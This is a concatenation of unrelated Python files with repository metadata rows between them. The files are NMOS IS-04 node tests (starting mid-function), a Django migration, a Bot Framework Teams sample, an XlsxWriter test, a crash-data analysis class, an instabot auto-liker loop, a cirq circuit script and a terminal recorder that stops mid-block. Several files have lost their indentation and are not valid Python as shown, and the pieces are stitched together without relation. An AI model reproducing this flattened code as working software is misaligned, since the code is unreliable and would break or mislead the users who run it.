# Only warn about these at the end so that more major failures are flagged first
# Protocols other than HTTP may be used, so don't incorrectly flag those too
control_href_scheme_warn = True
if href.startswith("https://") and urlparse(href).hostname[-1].isdigit():
control_href_hostname_warn = True
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
valid, response = self.do_request("GET", self.node_url + "senders")
if not valid or response.status_code != 200:
return test.FAIL("Unexpected response from the Node API: {}".format(response))
try:
node_senders = response.json()
for sender in node_senders:
href = sender["manifest_href"]
if href is not None and href.startswith("http") and not href.startswith(self.protocol + "://"):
manifest_href_scheme_warn = True
if href is not None and href.startswith("https://") and urlparse(href).hostname[-1].isdigit():
manifest_href_hostname_warn = True
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
if href_hostname_warn:
return test.WARNING("Node 'href' value has an IP address not a hostname")
elif api_endpoint_host_warn:
return test.WARNING("One or more Node 'api.endpoints.host' values are an IP address not a hostname")
elif service_href_hostname_warn:
return test.WARNING("One or more Node service 'href' values have an IP address not a hostname")
elif control_href_hostname_warn:
return test.WARNING("One or more Device control 'href' values have an IP address not a hostname")
elif manifest_href_hostname_warn:
return test.WARNING("One or more Sender 'manifest_href' values have an IP address not a hostname")
elif service_href_scheme_warn:
return test.WARNING("One or more Node service 'href' values do not match the current protocol")
elif control_href_scheme_warn:
return test.WARNING("One or more Device control 'href' values do not match the current protocol")
elif manifest_href_scheme_warn:
return test.WARNING("One or more Sender 'manifest_href' values do not match the current protocol")
return test.PASS()
def test_21(self, test):
"""Node correctly interprets a 200 code from a registry upon initial registration"""
if not CONFIG.ENABLE_DNS_SD:
return test.DISABLED("This test cannot be performed when ENABLE_DNS_SD is False")
registry_info = self._registry_mdns_info(self.primary_registry.get_data().port, 0)
# Reset the registry to clear previous heartbeats, and enable in 200 test mode
self.primary_registry.reset()
self.primary_registry.enable(first_reg=True)
if CONFIG.DNS_SD_MODE == "multicast":
# Advertise a registry at pri 0 and allow the Node to do a basic registration
self.zc.register_service(registry_info)
# Wait for n seconds after advertising the service for the first POST and then DELETE from a Node
self.primary_registry.wait_for_registration(CONFIG.DNS_SD_ADVERT_TIMEOUT)
self.primary_registry.wait_for_delete(CONFIG.HEARTBEAT_INTERVAL + 1)
# Wait for the Node to finish its interactions
while (time.time() - self.primary_registry.last_time) < CONFIG.HEARTBEAT_INTERVAL + 1:
time.sleep(0.2)
# By this point we should have had at least one Node POST and a corresponding DELETE
if CONFIG.DNS_SD_MODE == "multicast":
self.zc.unregister_service(registry_info)
self.primary_registry.disable()
# Get the relevant Node ID
url = "{}self".format(self.node_url)
valid, r = self.do_request("GET", url)
if valid and r.status_code == 200:
try:
# Check that a POST and DELETE match the Node's ID
node_id = r.json()["id"]
found_post = False
for resource in self.primary_registry.get_data().posts:
if resource[1]["payload"]["type"] == "node" and resource[1]["payload"]["data"]["id"] == node_id:
found_post = True
if not found_post:
return test.FAIL("Node did not attempt to make contact with the registry")
found_delete = False
found_extra_deletes = False
for resource in self.primary_registry.get_data().deletes:
if resource[1]["type"] == "node" and resource[1]["id"] == node_id:
found_delete = True
elif resource[1]["type"] != "node":
found_extra_deletes = True
if not found_delete:
return test.FAIL("Node did not attempt to DELETE itself having encountered a 200 code on initial "
"registration")
elif found_extra_deletes:
return test.WARNING("Node DELETEd more than just its 'node' resource. This is unnecessary when "
"encountering a 200 code on initial registration")
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
else:
return test.FAIL("Unexpected responses from Node API self resource")
return test.PASS()
def test_22(self, test):
"""Node resource IDs persist over a reboot"""
return test.MANUAL("This check must be performed manually, or via use of the following tool",
"https://github.com/AMWA-TV/nmos-testing/blob/master/utilities/uuid-checker/README.md")
def test_23(self, test):
"""Senders and Receivers correctly use BCP-002-01 grouping syntax"""
found_groups = False
found_senders_receivers = False
groups = {"node": {}, "device": {}}
for resource_name in ["senders", "receivers"]:
valid, response = self.do_request("GET", self.node_url + resource_name)
if valid and response.status_code == 200:
try:
for resource in response.json():
found_senders_receivers = True
if resource["device_id"] not in groups["device"]:
groups["device"][resource["device_id"]] = {}
for tag_name, tag_value in resource["tags"].items():
if tag_name != "urn:x-nmos:tag:grouphint/v1.0":
continue
if not isinstance(tag_value, list) or len(tag_value) == 0:
return test.FAIL("Group tag for {} {} is not an array or has too few items"
.format(resource_name.capitalize().rstrip("s"), resource["id"]))
found_groups = True
for group_def in tag_value:
group_params = group_def.split(":")
group_scope = "device"
# Perform basic validation on the group syntax
if len(group_params) < 2:
return test.FAIL("Group syntax for {} {} has too few parameters"
.format(resource_name.capitalize().rstrip("s"), resource["id"]))
elif len(group_params) > 3:
return test.FAIL("Group syntax for {} {} has too many parameters"
.format(resource_name.capitalize().rstrip("s"), resource["id"]))
elif len(group_params) == 3:
if group_params[2] not in ["device", "node"]:
return test.FAIL("Group syntax for {} {} uses an invalid group scope: {}"
.format(resource_name.capitalize().rstrip("s"), resource["id"],
group_params[2]))
group_scope = group_params[2]
# Ensure we have a reference to the group name stored
if group_scope == "node":
if group_params[0] not in groups["node"]:
groups["node"][group_params[0]] = {}
group_ref = groups["node"][group_params[0]]
elif group_scope == "device":
if group_params[0] not in groups["device"][resource["device_id"]]:
groups["device"][resource["device_id"]][group_params[0]] = {}
group_ref = groups["device"][resource["device_id"]][group_params[0]]
# Check for duplicate roles within groups
if group_params[1] in group_ref:
return test.FAIL("Duplicate role found in group {} for resources {} and {}"
.format(group_params[0], resource["id"],
group_ref[group_params[1]]))
else:
group_ref[group_params[1]] = resource["id"]
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
if not found_senders_receivers:
return test.UNCLEAR("No Sender or Receiver resources were found on the Node")
elif found_groups:
return test.PASS()
else:
return test.OPTIONAL("No BCP-002-01 groups were identified in Sender or Receiver tags",
"https://amwa-tv.github.io/nmos-grouping/best-practice-natural-grouping.html")
def test_24(self, test):
"""Periodic Sources specify a 'grain_rate'"""
valid, response = self.do_request("GET", self.node_url + "sources")
if valid and response.status_code == 200:
try:
for resource in response.json():
# Currently testing where it would be particularly unusual to find a non-periodic Source
if resource["format"] in ["urn:x-nmos:format:video",
"urn:x-nmos:format:audio",
"urn:x-nmos:format:mux"]:
if "grain_rate" not in resource:
return test.WARNING("Sources MUST specify a 'grain_rate' if they are periodic")
if len(response.json()) > 0:
return test.PASS()
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
return test.UNCLEAR("No Source resources were found on the Node")
def test_24_01(self, test):
"""Periodic Flows' 'grain_rate' is divisible by their parent Source 'grain_rate'"""
source_valid, source_response = self.do_request("GET", self.node_url + "sources")
flow_valid, flow_response = self.do_request("GET", self.node_url + "flows")
if source_valid and flow_valid and source_response.status_code == 200 and flow_response.status_code == 200:
try:
sources = {source["id"]: source for source in source_response.json()}
flows = flow_response.json()
for flow in flows:
if "grain_rate" in flow:
source = sources[flow["source_id"]]
if "grain_rate" not in source:
return test.FAIL("Sources MUST specify a 'grain_rate' when their child Flows specify a "
"'grain_rate'")
flow_rate = flow["grain_rate"]
if "denominator" not in flow_rate:
flow_rate["denominator"] = 1
source_rate = source["grain_rate"]
if "denominator" not in source_rate:
source_rate["denominator"] = 1
if ((source_rate["numerator"] * flow_rate["denominator"]) %
(flow_rate["numerator"] * source_rate["denominator"])):
return test.FAIL("Flow 'grain_rate' MUST be integer divisible by the Source 'grain_rate'")
elif flow["format"] in ["urn:x-nmos:format:video",
"urn:x-nmos:format:audio",
"urn:x-nmos:format:mux"]:
return test.WARNING("Flows SHOULD specify a 'grain_rate' if they are periodic")
if len(flow_response.json()) > 0:
return test.PASS()
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
except KeyError:
return test.FAIL("No Source found for one or more advertised Flows")
return test.UNCLEAR("No Source or Flow resources were found on the Node")
def test_25(self, test):
"""Receivers expose expected 'caps' for their API version"""
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.1") < 0:
return test.NA("Capabilities are not used before API v1.1")
receivers_valid, receivers_response = self.do_request("GET", self.node_url + "receivers")
no_receivers = True
if receivers_valid and receivers_response.status_code == 200:
try:
for receiver in receivers_response.json():
no_receivers = False
if "media_types" not in receiver["caps"]:
return test.WARNING("Receiver 'caps' should include a list of accepted 'media_types', unless "
"this Receiver can handle any 'media_type'",
"https://amwa-tv.github.io/nmos-discovery-registration/branches/{}/docs/"
"4.3._Behaviour_-_Nodes.html#all-resources".format(api["spec_branch"]))
if self.is04_utils.compare_api_version(api["version"], "v1.3") >= 0:
if receiver["format"] == "urn:x-nmos:format:data" and \
receiver["transport"] in ["urn:x-nmos:transport:websocket", "urn:x-nmos:transport:mqtt"]:
# Technically this is a bit IS-07 specific, but it may still be best placed here for now
if "event_types" not in receiver["caps"]:
return test.WARNING("Receiver 'caps' should include a list of accepted 'event_types' "
"if the Receiver accepts IS-07 events, unless this Receiver can "
"handle any 'event_type'",
"https://amwa-tv.github.io/nmos-discovery-registration/branches/{}/"
"docs/4.3._Behaviour_-_Nodes.html#all-resources"
.format(api["spec_branch"]))
except json.JSONDecodeError:
return test.FAIL("Non-JSON response returned from Node API")
except KeyError as e:
return test.FAIL("Unable to find expected key in the Receiver: {}".format(e))
if no_receivers:
return test.UNCLEAR("No Receivers were found on the Node")
else:
return test.PASS()
def do_receiver_put(self, test, receiver_id, data):
"""Perform a PUT to the Receiver 'target' resource with the specified data"""
valid, put_response = self.do_request("PUT", self.node_url + "receivers/" + receiver_id + "/target", json=data)
if not valid:
raise NMOSTestException(test.FAIL("Unexpected response from the Node API: {}".format(put_response)))
if put_response.status_code == 501:
api = self.apis[NODE_API_KEY]
if self.is04_utils.compare_api_version(api["version"], "v1.3") >= 0:
raise NMOSTestException(test.OPTIONAL("Node indicated that basic connection management is not "
"supported",
NMOS_WIKI_URL + "/IS-04#nodes-basic-connection-management"))
else:
raise NMOSTestException(test.WARNING("501 'Not Implemented' status code is not supported below API "
"version v1.3",
NMOS_WIKI_URL + "/IS-04#nodes-basic-connection-management"))
elif put_response.status_code != 202:
raise NMOSTestException(test.FAIL("Receiver target PUT did not produce a 202 response code: "
"{}".format(put_response.status_code)))
schema = self.get_schema(NODE_API_KEY, "PUT", "/receivers/{receiverId}/target", put_response.status_code)
valid, message = self.check_response(schema, "PUT", put_response)
if valid:
# if message:
# return WARNING somehow...
pass
else:
raise NMOSTestException(test.FAIL(message))
def collect_mdns_announcements(self):
"""Helper function to collect Node mDNS announcements in the presence of a Registration API"""
registry_info = self._registry_mdns_info(self.primary_registry.get_data().port, 0)
# Reset the registry to clear previous data, although we won't be checking it
self.primary_registry.reset()
self.primary_registry.enable()
if CONFIG.DNS_SD_MODE == "multicast":
# Advertise a registry at pri 0 and allow the Node to do a basic registration
self.zc.register_service(registry_info)
# Wait for n seconds after advertising the service for the first POST from a Node
self.primary_registry.wait_for_registration(CONFIG.DNS_SD_ADVERT_TIMEOUT)
ServiceBrowser(self.zc, "_nmos-node._tcp.local.", self.zc_listener)
time.sleep(CONFIG.DNS_SD_BROWSE_TIMEOUT)
node_list = self.zc_listener.get_service_list()
# Withdraw the registry advertisement now we've performed a browse for Node advertisements
if CONFIG.DNS_SD_MODE == "multicast":
self.zc.unregister_service(registry_info)
self.primary_registry.disable()
return node_list
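
# Hedged, illustrative sketch (not part of the test suite): a minimal,
# self-contained version of the zeroconf browse pattern used by
# collect_mdns_announcements() above. The listener class and sleep interval
# are assumptions for this example only; the service type matches the one
# browsed for by the suite.
def _example_browse_nmos_nodes(timeout=5):
    import time
    from zeroconf import ServiceBrowser, Zeroconf

    class _Listener:
        def __init__(self):
            self.names = []

        def add_service(self, zc, service_type, name):
            # Called by zeroconf whenever a matching service is discovered
            self.names.append(name)

        def remove_service(self, zc, service_type, name):
            pass

        def update_service(self, zc, service_type, name):
            pass

    zc = Zeroconf()
    listener = _Listener()
    ServiceBrowser(zc, "_nmos-node._tcp.local.", listener)
    time.sleep(timeout)
    zc.close()
    return listener.names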
| 50.211602 | 121 | 0.571504 |
04e8335e7c4ecd6f61510a1f43c23bb7884dee16
| 1,296 |
py
|
Python
|
fuzzybee/resume/migrations/0001_initial.py
|
youtaya/knight
|
6899e18ca6b1ef01daaae7d7fd14b50a26aa0aee
|
[
"MIT"
] | null | null | null |
fuzzybee/resume/migrations/0001_initial.py
|
youtaya/knight
|
6899e18ca6b1ef01daaae7d7fd14b50a26aa0aee
|
[
"MIT"
] | null | null | null |
fuzzybee/resume/migrations/0001_initial.py
|
youtaya/knight
|
6899e18ca6b1ef01daaae7d7fd14b50a26aa0aee
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('joboard', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Resume',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('identity_image', models.ImageField(upload_to=b'identity')),
('name', models.CharField(max_length=24, blank=True)),
('gender', models.CharField(max_length=4)),
('birthday', models.CharField(max_length=24)),
('experience', models.CharField(max_length=24)),
('education', models.CharField(max_length=24)),
('phone', models.CharField(max_length=24)),
('apply_job', models.CharField(max_length=24)),
('expect_salary', models.CharField(max_length=24)),
('self_description', models.CharField(max_length=100)),
('apply_factory', models.ForeignKey(related_name='factory', to='joboard.Factory')),
],
options={
},
bases=(models.Model,),
),
]
| 37.028571 | 114 | 0.566358 |
9f6ce6a4b7bd25e45daed898600f34939f3e44c9
| 3,045 |
py
|
Python
|
samples/python/54.teams-task-module/app.py
|
kenguil/BF4
|
5954f40f30c71a38c5f1550db50d19b2a9c2427d
|
[
"MIT"
] | 1 |
2020-10-30T16:44:04.000Z
|
2020-10-30T16:44:04.000Z
|
samples/python/54.teams-task-module/app.py
|
kenguil/BF4
|
5954f40f30c71a38c5f1550db50d19b2a9c2427d
|
[
"MIT"
] | null | null | null |
samples/python/54.teams-task-module/app.py
|
kenguil/BF4
|
5954f40f30c71a38c5f1550db50d19b2a9c2427d
|
[
"MIT"
] | 1 |
2020-07-30T11:34:14.000Z
|
2020-07-30T11:34:14.000Z
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import sys
import traceback
from datetime import datetime
from http import HTTPStatus
from aiohttp import web
from aiohttp.web import Request, Response, json_response
from botbuilder.core import (
BotFrameworkAdapterSettings,
TurnContext,
BotFrameworkAdapter,
)
from botbuilder.core.integration import aiohttp_error_middleware
from botbuilder.schema import Activity, ActivityTypes
from bots import TeamsTaskModuleBot
from config import DefaultConfig
CONFIG = DefaultConfig()
# Create adapter.
# See https://aka.ms/about-bot-adapter to learn more about how bots work.
SETTINGS = BotFrameworkAdapterSettings(CONFIG.APP_ID, CONFIG.APP_PASSWORD)
ADAPTER = BotFrameworkAdapter(SETTINGS)
# Catch-all for errors.
async def on_error(context: TurnContext, error: Exception):
    # This check writes out errors to the console log vs. Application Insights.
# NOTE: In production environment, you should consider logging this to Azure
# application insights.
print(f"\n [on_turn_error] unhandled error: {error}", file=sys.stderr)
traceback.print_exc()
# Send a message to the user
await context.send_activity("The bot encountered an error or bug.")
await context.send_activity(
"To continue to run this bot, please fix the bot source code."
)
# Send a trace activity if we're talking to the Bot Framework Emulator
if context.activity.channel_id == "emulator":
# Create a trace activity that contains the error object
trace_activity = Activity(
label="TurnError",
name="on_turn_error Trace",
timestamp=datetime.utcnow(),
type=ActivityTypes.trace,
value=f"{error}",
value_type="https://www.botframework.com/schemas/error",
)
# Send a trace activity, which will be displayed in Bot Framework Emulator
await context.send_activity(trace_activity)
ADAPTER.on_turn_error = on_error
# Create the Bot
BOT = TeamsTaskModuleBot()
# Listen for incoming requests on /api/messages
async def messages(req: Request) -> Response:
# Main bot message handler.
if "application/json" in req.headers["Content-Type"]:
body = await req.json()
else:
return Response(status=HTTPStatus.UNSUPPORTED_MEDIA_TYPE)
activity = Activity().deserialize(body)
auth_header = req.headers["Authorization"] if "Authorization" in req.headers else ""
invoke_response = await ADAPTER.process_activity(
activity, auth_header, BOT.on_turn
)
if invoke_response:
return json_response(
data=invoke_response.body, status=invoke_response.status
)
return Response(status=HTTPStatus.OK)
APP = web.Application(middlewares=[aiohttp_error_middleware])
APP.router.add_post("/api/messages", messages)
if __name__ == "__main__":
try:
web.run_app(APP, host="localhost", port=CONFIG.PORT)
except Exception as error:
raise error
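
# Hedged, client-side sketch (not part of the sample): the kind of JSON payload
# the /api/messages handler above deserializes into an Activity. In practice a
# Bot Framework channel or the Emulator sends this request (with an
# Authorization header); the port, ids and text below are placeholders.
def _example_post_activity(port=3978):
    import requests

    payload = {
        "type": "message",
        "text": "hello bot",
        "channelId": "emulator",
        "conversation": {"id": "example-conversation"},
        "from": {"id": "example-user"},
        "recipient": {"id": "example-bot"},
        "serviceUrl": "http://localhost:{}".format(port),
    }
    return requests.post(
        "http://localhost:{}/api/messages".format(port),
        json=payload,
        headers={"Content-Type": "application/json"},
    )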
| 33.097826 | 88 | 0.718883 |
f5816f4dd90979298aa30fa2d4f097cf2bd2096e
| 797 |
py
|
Python
|
xlsxwriter/test/comparison/test_image24.py
|
dthadi3/XlsxWriter
|
f1801e82240aa9c746ce14948ef95990b83162cf
|
[
"BSD-2-Clause-FreeBSD"
] | 1 |
2020-07-01T07:24:37.000Z
|
2020-07-01T07:24:37.000Z
|
xlsxwriter/test/comparison/test_image24.py
|
dthadi3/XlsxWriter
|
f1801e82240aa9c746ce14948ef95990b83162cf
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
xlsxwriter/test/comparison/test_image24.py
|
dthadi3/XlsxWriter
|
f1801e82240aa9c746ce14948ef95990b83162cf
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2020, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('image24.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with image(s)."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
worksheet.insert_image('B2', self.image_dir + 'black_300.png')
workbook.close()
self.assertExcelEqual()
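
# Hedged standalone sketch (not part of the comparison test): the same
# insert_image() call used outside the test harness. The workbook and image
# file names are placeholders; x_scale/y_scale are optional insert_image()
# parameters shown for illustration.
def _example_insert_image(filename="example_image.xlsx", image_path="logo.png"):
    workbook = Workbook(filename)
    worksheet = workbook.add_worksheet()

    # Insert the image at cell B2, scaled to half size.
    worksheet.insert_image("B2", image_path, {"x_scale": 0.5, "y_scale": 0.5})

    workbook.close()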
| 23.441176 | 79 | 0.614806 |
21cf4897a8ca0a543b8347f25ac1ca64eb8d88fc
| 1,884 |
py
|
Python
|
code/town_acc.py
|
akonstodata/CT_crash_analysis
|
66a8ecce5279f4dfc9f1cc3766a00573229812ca
|
[
"MIT"
] | 1 |
2020-10-04T20:54:25.000Z
|
2020-10-04T20:54:25.000Z
|
code/town_acc.py
|
akonstodata/CT_crash_analysis
|
66a8ecce5279f4dfc9f1cc3766a00573229812ca
|
[
"MIT"
] | null | null | null |
code/town_acc.py
|
akonstodata/CT_crash_analysis
|
66a8ecce5279f4dfc9f1cc3766a00573229812ca
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This module defines the town_acc class for subsetting and plotting
CT I-84 crash data by town.
@author: Anna Konstorum (konstorum.anna@gmail.com)
"""
import plot_results
class town_acc():
"""Analyzing I-84 CT crash data by town"""
#import numpy as np
def __init__(self,town,full_data,exit_mile,town_mile):
"""Initialize town and full data repository"""
self.town = town
self.full_data = full_data
self.exit_mile = exit_mile
self.town_mile = town_mile
def get_town_data(self):
"""Subset full data by town if requested"""
full_data_crash = self.full_data
if self.town == 'All':
town_data_subset = full_data_crash
else:
town_data_subset = full_data_crash[full_data_crash["Town_Name"]==self.town]
return(town_data_subset)
def get_weekdays(self,town_data_subset):
"""Subset for just weekdays"""
town_data_weekday = town_data_subset[(town_data_subset["Day_of_the_Week_Text_Format"]!="Saturday")
& (town_data_subset["Day_of_the_Week_Text_Format"]!="Sunday")]
town_data_weekday = town_data_weekday.reset_index()
return town_data_weekday
def get_rush_hour(self,town_data_subset,morn_eve):
if morn_eve == "morning":
start_time="06:00:00"
end_time="09:00:00"
else:
start_time = "16:00:00"
end_time = "19:00:00"
town_data_rush_hour = town_data_subset[town_data_subset.final_time.dt.strftime("%H:%M:%S").between(start_time,end_time)]
return town_data_rush_hour
def plot_town_data(self,town_data_subset, y_max, y_min,title_out):
plot_results.plot_accidents_bytown(self.exit_mile, self.town_mile,self.town,town_data_subset, y_max, y_min, title_out)
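
# Hedged usage sketch (not in the original module): exercises the subsetting
# helpers above on a tiny, made-up DataFrame. The column names are taken from
# the methods above; the town names are placeholders, and the exit/town mile
# arguments are only needed for plotting so they are left empty here.
def _example_town_subsets():
    import pandas as pd

    crashes = pd.DataFrame({
        "Town_Name": ["Danbury", "Danbury", "Hartford"],
        "Day_of_the_Week_Text_Format": ["Monday", "Saturday", "Tuesday"],
        "final_time": pd.to_datetime([
            "2020-01-06 07:30:00",
            "2020-01-11 12:00:00",
            "2020-01-07 17:15:00",
        ]),
    })

    danbury = town_acc("Danbury", crashes, exit_mile=[], town_mile=[])
    subset = danbury.get_town_data()
    weekdays = danbury.get_weekdays(subset)
    morning_rush = danbury.get_rush_hour(weekdays, "morning")
    return morning_rush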
| 36.941176 | 129 | 0.656582 |
4d4efa71cbcf08423c785686d0bca830d89b7738
| 631 |
py
|
Python
|
examples/infinity_feedliker.py
|
pierfani/instabot
|
2eb724e2f7e7e14df67098c71a871f036574e33c
|
[
"Apache-2.0"
] | 4 |
2019-08-17T01:27:20.000Z
|
2020-01-08T12:01:34.000Z
|
examples/infinity_feedliker.py
|
pierfani/instabot
|
2eb724e2f7e7e14df67098c71a871f036574e33c
|
[
"Apache-2.0"
] | 4 |
2019-02-25T08:48:07.000Z
|
2019-03-07T17:06:15.000Z
|
examples/infinity_feedliker.py
|
pierfani/instabot
|
2eb724e2f7e7e14df67098c71a871f036574e33c
|
[
"Apache-2.0"
] | 5 |
2019-04-10T04:53:14.000Z
|
2020-05-17T09:10:06.000Z
|
"""
instabot example
Workflow:
Like rescent medias from your timeline feed.
"""
import argparse
import os
import sys
import time
sys.path.append(os.path.join(sys.path[0], '../'))
from instabot import Bot
parser = argparse.ArgumentParser(add_help=True)
parser.add_argument('-u', type=str, help="username")
parser.add_argument('-p', type=str, help="password")
parser.add_argument('-proxy', type=str, help="proxy")
args = parser.parse_args()
bot = Bot()
bot.login(username=args.u, password=args.p,
proxy=args.proxy)
wait = 5 * 60 # in seconds
while True:
bot.like_timeline()
time.sleep(wait)
| 20.354839 | 53 | 0.690967 |
2249b1559381e099d154e526407cdd5dc76d60b3
| 1,818 |
py
|
Python
|
data/p2DJ/New/program/cirq/startCirq168.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p2DJ/New/program/cirq/startCirq168.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p2DJ/New/program/cirq/startCirq168.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=2
# total number=10
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.Y.on(input_qubit[1])) # number=2
c.append(cirq.Y.on(input_qubit[1])) # number=4
c.append(cirq.Y.on(input_qubit[1])) # number=3
c.append(cirq.rx(2.0860175219836226).on(input_qubit[1])) # number=7
c.append(cirq.X.on(input_qubit[0])) # number=5
c.append(cirq.X.on(input_qubit[0])) # number=6
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=8
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=9
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq168.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close()
| 28.40625 | 77 | 0.694169 |
5984f249444dd00fb8b3ee4bf26f283c9a91a344
| 7,930 |
py
|
Python
|
termrec/__init__.py
|
donno2048/termrec
|
114b99e5e0c486c0ea3334b138c35a5bfc992440
|
[
"MIT"
] | 4 |
2021-12-09T17:30:42.000Z
|
2021-12-30T09:35:52.000Z
|
termrec/__init__.py
|
donno2048/termrec
|
114b99e5e0c486c0ea3334b138c35a5bfc992440
|
[
"MIT"
] | null | null | null |
termrec/__init__.py
|
donno2048/termrec
|
114b99e5e0c486c0ea3334b138c35a5bfc992440
|
[
"MIT"
] | null | null | null |
from json import loads, dumps
from codecs import getincrementaldecoder
from time import time
from select import select
from os import read, environ, get_terminal_size, isatty, write, execvpe, pipe, O_NONBLOCK, waitpid, close
from array import array
from fcntl import ioctl, fcntl, F_GETFL, F_SETFL
from signal import signal, SIGCHLD, SIGHUP, SIGTERM, SIGQUIT, set_wakeup_fd, SIGWINCH
from termios import error, TCSAFLUSH, tcgetattr, tcsetattr, TIOCGWINSZ, TIOCSWINSZ
from multiprocessing import Process, Queue
WIDTH, HEIGHT = get_terminal_size()
ENV = {'SHELL': environ.get('SHELL'), 'TERM': environ.get('TERM')}
class writer():
def __init__(self, path, header): self.path, self.decstdin, self.decstdout, self.header = path, getincrementaldecoder('UTF-8')('replace'), getincrementaldecoder('UTF-8')('replace'), header
def __enter__(self):
self.file = open(self.path, mode='w', buffering=1)
self.write_line(self.header)
return self
def __exit__(self, exc_type, exc_value, exc_traceback): self.file.close()
def write_event(self, ts):
ts, etype, data = ts
ts = round(ts, 6)
if etype == 'o':
if type(data) == str: data = data.encode(encoding='utf-8', errors='strict')
self.write_line([ts, etype, self.decstdout.decode(data)])
elif etype == 'i':
if type(data) == str: data = data.encode(encoding='utf-8', errors='strict')
self.write_line([ts, etype, self.decstdin.decode(data)])
else: self.write_line([ts, etype, data])
def write_stdout(self, ts, data): self.write_event(ts, 'o', data)
def write_stdin(self, ts, data): self.write_event(ts, 'i', data)
def write_line(self, obj): self.file.write(dumps(obj, ensure_ascii=False, indent=None, separators=(', ', ': ')) + '\n')
def write_json(path, header, queue):
with writer(path, header) as w:
for event in iter(queue.get, None): w.write_event(event)
class async_writer():
def __init__(self, path, metadata): self.path, self.metadata, self.queue = path, metadata, Queue()
def __enter__(self):
self.process = Process(target=write_json, args=(self.path, self.metadata, self.queue))
self.process.start()
self.start_time = time()
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
self.queue.put(None)
self.process.join()
def write_stdin(self, data): self.queue.put([time() - self.start_time, 'i', data])
def write_stdout(self, data): self.queue.put([time() - self.start_time, 'o', data])
class raw():
def __init__(self, fd): self.fd, self.restore = fd, False
def __enter__(self):
try:
self.mode = tcgetattr(self.fd)
__import__("tty").setraw(self.fd)
self.restore = True
except error: pass
def __exit__(self, type, value, traceback):
if self.restore: tcsetattr(self.fd, TCSAFLUSH, self.mode)
def record(command, writer):
master_fd = None
def _set_pty_size():
if isatty(1):
buf = array('h', [0, 0, 0, 0])
ioctl(1, TIOCGWINSZ, buf, True)
else: buf = array('h', [24, 80, 0, 0])
ioctl(master_fd, TIOCSWINSZ, buf)
def _write_stdout(data): write(1, data)
def _handle_master_read(data):
writer.write_stdout(data)
_write_stdout(data)
def _write_master(data):
while data: data = data[write(master_fd, data):]
def _handle_stdin_read(data): _write_master(data) #;writer.write_stdin(data)
def _signals(signal_list): return [(sig, signal(sig, handler)) for sig, handler in signal_list]
def _copy(signal_fd):
fds = [master_fd, 0, signal_fd]
while True:
try: rfds, wfds, xfds = select(fds, [], [])
except OSError as e:
if e.errno == 4: continue
if master_fd in rfds:
data = read(master_fd, 1024)
if not data: fds.remove(master_fd)
else: _handle_master_read(data)
if 0 in rfds:
data = read(0, 1024)
if not data: fds.remove(0)
else: _handle_stdin_read(data)
if signal_fd in rfds:
data = read(signal_fd, 1024)
if data:
signals = __import__("struct").unpack('%uB' % len(data), data)
for sig in signals:
if sig in [SIGCHLD, SIGHUP, SIGTERM, SIGQUIT]:
close(master_fd)
return
elif sig == SIGWINCH: _set_pty_size()
pid, master_fd = __import__("pty").fork()
if not pid: execvpe(command[0], command, environ)
pipe_r, pipe_w = pipe()
flags = fcntl(pipe_w, F_SETFL, fcntl(pipe_w, F_GETFL, 0) | O_NONBLOCK)
set_wakeup_fd(pipe_w)
old_handlers = _signals(map(lambda s: (s, lambda signal, frame: None), [SIGWINCH, SIGCHLD, SIGHUP, SIGTERM, SIGQUIT]))
_set_pty_size()
with raw(0):
try: _copy(pipe_r)
